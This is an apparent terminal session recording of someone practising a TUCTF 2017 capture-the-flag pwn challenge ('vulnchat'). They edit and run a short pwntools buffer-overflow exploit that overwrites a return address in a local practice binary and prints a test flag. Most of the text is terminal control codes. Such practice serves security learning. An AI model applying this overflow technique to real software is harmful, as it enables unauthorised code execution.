[384.268291, "o", "\u001b[27m\u001b[23m\u001b[29m\u001b[m\u001b[H\u001b[2J\u001b[?25l\u001b[42;1H\"exp.py\" 13L, 273B"]
[384.278402, "o", "\u001b[2;1H▽\u001b[6n\u001b[2;1H  \u001b[3;1H\u001bPzz\u001b\\\u001b[0%m\u001b[6n\u001b[3;1H           \u001b[1;1H\u001b[>c\u001b]10;?\u0007\u001b]11;?\u0007"]
[384.282159, "o", "\u001b[1;1H\u001b[35mfrom\u001b[m pwn \u001b[35mimport\u001b[m *\r\npay = b\u001b[31m\"\"\u001b[m\u001b[2;10H\u001b[K\u001b[3;1Hpay += b\u001b[31m\"A\"\u001b[m * \u001b[31m20\u001b[m\u001b[3;17H\u001b[K\u001b[4;1Hpay += p32(\u001b[31m0x73393925\u001b[m)\r\np = process(\u001b[31m\"./vuln-chat\"\u001b[m)\r\np.recvuntil(b\u001b[31m\"Enter your username:\"\u001b[m)\r\np.sendline(pay)\r\npay1 = b\u001b[31m\"\"\u001b[m\r\npay1 += b\u001b[31m\"A\"\u001b[m * \u001b[31m49\u001b[m\r\npay1 += p32(\u001b[31m0x0804856b\u001b[m)\r\np.recvline(b\u001b[31m\"I know I can trust you?\"\u001b[m)\r\np.sendline(pay1)\r\np.interative()\r\n\u001b[94m~                                                                                                                                      \u001b[15;1H~                                                                                                                                      \u001b[16;1H~                                                                                                                                      \u001b[17;1H~                                                                                                                                      \u001b[18;1H~                                                                                                                                      \u001b[19;1H~                                                                                                                                      \u001b[20;1H~                                                                                                                                      \u001b[21;1H~                                                                                                                                      \u001b[22;1H~                                                                                                                                      \u001b[23;1H~                                                                                                                                      \u001b[24;1H~                                                                                                                                      \u001b[25;1H~                                                                                                                                      \u001b[26;1H~                                                                                                                                      \u001b[27;1H~                                                                                                                                      \u001b[28;1H~                                                                                                                                      \u001b[29;1H~                                                                                                                                      \u001b[30;1H~                                                                                                                                      \u001b[31;1H~                                                                                                                                      \u001b[32;1H~                                                                                                                                      \u001b[33;1H~                                                                                                                                      \u001b[34;1H~                                                                                                                                      \u001b[35;1H~                                                                                                                                      \u001b[36;1H~                                                                                                                                      \u001b[37;1H~                                                                                                                                      \u001b[38;1H~                                                                                                                                      "]
[384.282304, "o", "\u001b[39;1H~                                                                                                                                      \u001b[40;1H~                                                                                                                                      \u001b[41;1H~                                                                                                                                      \u001b[m\u001b[42;118H11,6\u001b[10CAll\u001b[11;6H\u001b[?25h\u001b[?4m"]
[384.29501, "o", "\u001bP+q436f\u001b\\\u001bP+q6b75\u001b\\\u001bP+q6b64\u001b\\\u001bP+q6b72\u001b\\\u001bP+q6b6c\u001b\\\u001bP+q2332\u001b\\\u001bP+q2334\u001b\\\u001bP+q2569\u001b\\\u001bP+q2a37\u001b\\\u001bP+q6b31\u001b\\\u001bP$q q\u001b\\\u001b[?12$p"]
[384.295268, "o", "\u001b[?25l\u001b[42;108H5\u001b[11;6H\u001b[42;109H2\u001b[11;6H\u001b[42;110Hb\u001b[11;6H\u001b[42;111H/\u001b[11;6H\u001b[42;112H2\u001b[11;6H\u001b[42;113H7\u001b[11;6H\u001b[42;114Hd\u001b[11;6H\u001b[42;115H5\u001b[11;6H\u001b[42;116H/\u001b[11;6H\u001b[42;117H3\u001b[11;6H"]
[384.29771, "o", "\u001b[42;108H          \u001b[11;6H\u001b[27m\u001b[23m\u001b[29m\u001b[m\u001b[H\u001b[2J\u001b[1;1H\u001b[38;5;81mfrom\u001b[m pwn \u001b[38;5;81mimport\u001b[m *\r\npay = b\u001b[95m\"\"\u001b[m\r\npay += b\u001b[95m\"A\"\u001b[m * \u001b[95m20\u001b[m\r\npay += p32(\u001b[95m0x73393925\u001b[m)\r\np = process(\u001b[95m\"./vuln-chat\"\u001b[m)\r\np.recvuntil(b\u001b[95m\"Enter your username:\"\u001b[m)\r\np.sendline(pay)\r\npay1 = b\u001b[95m\"\"\u001b[m\r\npay1 += b\u001b[95m\"A\"\u001b[m * \u001b[95m49\u001b[m\r\npay1 += p32(\u001b[95m0x0804856b\u001b[m)\r\np.recvline(b\u001b[95m\"I know I can trust you?\"\u001b[m)\r\np.sendline(pay1)\r\np.interative()\r\n\u001b[94m~                                                                                                                                      \u001b[15;1H~                                                                                                                                      \u001b[16;1H~                                                                                                                                      \u001b[17;1H~                                                                                                                                      \u001b[18;1H~                                                                                                                                      \u001b[19;1H~                                                                                                                                      \u001b[20;1H~                                                                                                                                      \u001b[21;1H~                                                                                                                                      \u001b[22;1H~                                                                                                                                      \u001b[23;1H~                                                                                                                                      \u001b[24;1H~                                                                                                                                      \u001b[25;1H~                                                                                                                                      \u001b[26;1H~                                                                                                                                      \u001b[27;1H~                                                                                                                                      \u001b[28;1H~                                                                                                                                      \u001b[29;1H~                                                                                                                                      \u001b[30;1H~                                                                                                                                      \u001b[31;1H~                                                                                                                                      \u001b[32;1H~                                                                                                                                      \u001b[33;1H~                                                                                                                                      \u001b[34;1H~                                                                                                                                      \u001b[35;1H~                                                                                                                                      \u001b[36;1H~                                                                                                                                      \u001b[37;1H~                                                                                                                                      \u001b[38;1H~                                                                                                                                      "]
[384.297965, "o", "\u001b[39;1H~                                                                                                                                      \u001b[40;1H~                                                                                                                                      \u001b[41;1H~                                                                                                                                      \u001b[m\u001b[42;118H11,6\u001b[10CAll\r\"exp.py\" 13L, 273B\u001b[11;6H\u001b[?25h"]
[384.667028, "o", "\u001b[?25l\u001b[42;108Hi\u001b[11;6H"]
[384.667181, "o", "\u001b[42;108H \u001b[11;6H\u001b[42;1H\u001b[1m-- INSERT --\u001b[m\u001b[42;13H\u001b[K\u001b[42;118H11,6\u001b[10CAll\u001b[11;6H\u001b[?25h"]
[385.513067, "o", "\u001b[?25l\u001b[42;119H2\u001b[12;6H\u001b[?25h"]
[385.669098, "o", "\u001b[?25l\u001b[42;119H3\u001b[13;6H\u001b[?25h"]
[385.885346, "o", "\u0007"]
[386.185574, "o", "\u001b[?25l\u001b[42;121H7\u001b[13;7H\u001b[?25h"]
[386.361897, "o", "\u001b[?25l\u001b[42;121H8\u001b[13;8H\u001b[?25h"]
[386.525796, "o", "\u001b[?25l\u001b[42;121H9\u001b[13;9H\u001b[?25h"]
[387.14682, "o", "\u001b[?25lctive()\u001b[42;121H10\u001b[13;10H\u001b[?25h"]
[387.812109, "o", "\u001b[42;1H\u001b[K\u001b[13;9H\u001b[?25l\u001b[42;108H^[\u001b[13;9H"]
[387.912737, "o", "\u001b[42;108H  \u001b[13;10H"]
[387.913058, "o", "\u001b[42;118H13,9\u001b[10CAll\u001b[13;9H\u001b[?25h"]
[388.128158, "o", "\u001b[?25l\u001b[42;108H:\u001b[13;9H\u001b[42;108H\u001b[K\u001b[42;1H:\u001b[?25h"]
[388.28932, "o", "w"]
[388.647206, "o", "\r"]
[388.64735, "o", "\u001b[?25l\"exp.py\""]
[388.652109, "o", " 13L, 274B written"]
[388.652725, "o", "\u001b[13;9H\u001b[42;118H13,9\u001b[10CAll\u001b[42;118H\u001b[K\u001b[42;118H13,9\u001b[10CAll\u001b[13;9H\u001b[?25h"]
[389.403289, "o", "\u001b[?25l\u001b[42;108H^[\u001b[13;9H"]
[389.504041, "o", "\u001b[42;108H  \u001b[13;9H\u001b[42;108H^[\u001b[13;9H\u0007\u001b[42;108H  \u001b[13;9H\u001b[?25h"]
[389.696758, "o", "\u001b[?25l\u001b[42;108H:\u001b[13;9H\u001b[42;1H\u001b[K\u001b[42;1H:\u001b[?25h"]
[389.862228, "o", "w"]
[390.049574, "o", "q"]
[390.204907, "o", "\r\u001b[?25l\u001b[?1006;1000l\u001b[?1002l\u001b[?2004l\u001b[>4;m"]
[390.206055, "o", "\"exp.py\""]
[390.208381, "o", " 13L, 274B written"]
[390.210215, "o", "\r\u001b[23;2t\u001b[23;1t\r\r\n\u001b[?1004l\u001b[?2004l\u001b[?1l\u001b>\u001b[?1049l\u001b[23;0;0t\u001b[?25h\u001b[>4;m"]
[390.213143, "o", "                                                                                                                                       \r\r"]
[390.213378, "o", "\u001b]0;himanshu@Kaaammui: ~/Desktop/Github/CTF-Practice/pwn/01.BOF/tuctf 2017 vulnchat\u0007\r\n"]
[390.24556, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32m┌──(\u001b[1m\u001b[32m\u001b[34mhimanshu㉿Kaaammui\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~/…/CTF-Practice/pwn/01.BOF/tuctf 2017 vulnchat\u001b[0m\u001b[32m]\r\n└─\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m \u001b[K"]
[390.245682, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[390.828268, "o", "vim exp.py"]
[390.833515, "o", "\u001b[10D\u001b[36mv\u001b[36mi\u001b[36mm\u001b[39m \u001b[1me\u001b[1mx\u001b[1mp\u001b[1m.\u001b[1mp\u001b[1my\u001b[0m"]
[391.695328, "o", "\u001b[10D\u001b[36mp\u001b[36my\u001b[36mt\u001b[39mh\u001b[1mo\u001b[1mn\u001b[1m \u001b[1me\u001b[1mx\u001b[1mp\u001b[0m.py"]
[391.699921, "o", "\u001b[11D\u001b[36mt\u001b[36mh\u001b[0m\u001b[36mo\u001b[0m\u001b[36mn\u001b[39m\u001b[0m \u001b[2C\u001b[1mp\u001b[1m.\u001b[1mp\u001b[1my\u001b[0m"]
[392.330597, "o", "\u001b[?1l\u001b>"]
[392.330811, "o", "\u001b[?2004l"]
[392.335205, "o", "\r\r\n"]
[392.743263, "o", "[x] Starting local process './vuln-chat'\r\n"]
[392.743656, "o", "\u001b[A[\u001b[1m\u001b[34m.\u001b[m] \r\n"]
[392.753986, "o", "\u001b[5G\u001b[AStarting local process './vuln-chat': pid 43716\r\n"]
[392.75444, "o", "\u001b[A[\u001b[1m\u001b[32m+\u001b[m] \r\n"]
[392.758074, "o", "[\u001b[1m\u001b[34m*\u001b[m] Switching to interactive mode\r\n"]
[392.758812, "o", "Connecting to 'djinn'\r\n"]
[392.759455, "o", "\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\u001b[J"]
[392.759762, "o", "\u001b[?25l\u001b[?1h\u001b="]
[393.758076, "o", "\r"]
[393.758196, "o", "\u001b[J--- 'djinn' has joined your chat ---\r\ndjinn: I have the information. But how do I know I can trust you?\r\nAAAAAAAAAAAAAAAAAAAA%99s: djinn: Sorry. That's not good enough\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[393.761629, "o", "\r\u001b[Jctf{test_flag}\r\n"]
[393.761764, "o", "\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[393.762354, "o", "\r\u001b[JUse it wisely\r\n"]
[393.762455, "o", "\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[393.773844, "o", "\r\u001b[J[\u001b[1m\u001b[34m*\u001b[m] Got EOF while reading in interactive\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[396.76966, "o", "\u001b[3Ge\u001b[7m \u001b[m\u001b[J"]
[396.865113, "o", "\u001b[3Gex\u001b[7m \u001b[m\u001b[J"]
[396.945538, "o", "\u001b[3Gexi\u001b[7m \u001b[m\u001b[J"]
[397.042434, "o", "\u001b[3Gexit\u001b[7m \u001b[m\u001b[J"]
[397.202924, "o", "\u001b[3G\u001b[Kexit\r\n\u001b[J"]
[397.203691, "o", "[\u001b[1m\u001b[34m*\u001b[m] Process './vuln-chat' stopped with exit code -11 (SIGSEGV) (pid 43716)\r\n"]
[397.20392, "o", "[\u001b[1m\u001b[34m*\u001b[m] Got EOF while sending in interactive\r\n"]
[397.204128, "o", "\u001b[?12l\u001b[?25h\u001b[?1l\u001b>"]
[397.333044, "o", "                                                                                                                                       \r\r\u001b]0;himanshu@Kaaammui: ~/Desktop/Github/CTF-Practice/pwn/01.BOF/tuctf 2017 vulnchat\u0007"]
[397.333153, "o", "\r\n"]
[397.368067, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32m┌──(\u001b[1m\u001b[32m\u001b[34mhimanshu㉿Kaaammui\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~/…/CTF-Practice/pwn/01.BOF/tuctf 2017 vulnchat\u001b[0m\u001b[32m]\r\n└─\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m \u001b[K"]
[397.368404, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[398.353502, "o", "e"]
[398.360395, "o", "\b\u001b[4me\u001b[24m"]
[398.360546, "o", "\b\u001b[4me\u001b[24m\u001b[38;2;153;153;153mxit\u001b[39m\b\b\b"]
[398.417253, "o", "\b\u001b[4me\u001b[39m\u001b[4mx\u001b[24m"]
[398.421056, "o", "\b\b\u001b[24m\u001b[36me\u001b[24m\u001b[36mx\u001b[39m"]
[398.548171, "o", "\b\b\u001b[36me\u001b[36mx\u001b[36mi\u001b[39m"]
[398.555739, "o", "\b\b\b\u001b[39m\u001b[4me\u001b[39m\u001b[4mx\u001b[39m\u001b[4mi\u001b[24m"]
[398.685627, "o", "\b\u001b[4mi\u001b[39m\u001b[4mt\u001b[24m"]
[398.690094, "o", "\b\b\b\b\u001b[24m\u001b[36me\u001b[24m\u001b[36mx\u001b[24m\u001b[36mi\u001b[24m\u001b[36mt\u001b[39m"]
[400.401951, "o", "\u001b[?1l\u001b>"]
[400.402122, "o", "\u001b[?2004l"]
[400.404985, "o", "\r\r\n"]
